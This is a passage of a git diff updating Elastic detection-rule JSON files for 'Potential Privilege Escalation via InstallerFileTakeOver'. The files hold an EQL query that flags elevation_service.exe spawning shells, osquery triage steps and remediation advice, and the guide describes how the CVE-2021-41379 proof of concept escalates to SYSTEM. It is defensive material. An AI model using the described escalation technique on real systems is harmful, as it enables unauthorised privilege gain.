Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n",
 "references": [
 "https://github.com/klinix5/InstallerFileTakeOver"
@@ -67,7 +67,7 @@
 ],
 "risk_score": 73,
 "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_107.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_107.json
index 8dd9e458420..9dae2739cde 100644
--- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_107.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Privilege Escalation via InstallerFileTakeOver",
- "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n",
 "references": [
 "https://github.com/klinix5/InstallerFileTakeOver"
@@ -67,7 +67,7 @@
 ],
 "risk_score": 73,
 "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_108.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_108.json
index e443085cf07..9c57a982b3b 100644
--- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_108.json
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Privilege Escalation via InstallerFileTakeOver",
- "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name : \"System\" and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n \n (process.name : \"elevation_service.exe\" and\n not process.code_signature.trusted == true) or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n ) and\n not\n (\n process.name : \"elevation_service.exe\" and process.code_signature.trusted == true and\n process.pe.original_file_name == null\n )\n",
 "references": [
 "https://github.com/klinix5/InstallerFileTakeOver"
@@ -61,7 +61,7 @@
 ],
 "risk_score": 73,
 "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint", 
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_109.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_109.json
index e67490e90d9..0c6461ce313 100644
--- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_109.json 
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Privilege Escalation via InstallerFileTakeOver",
- "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
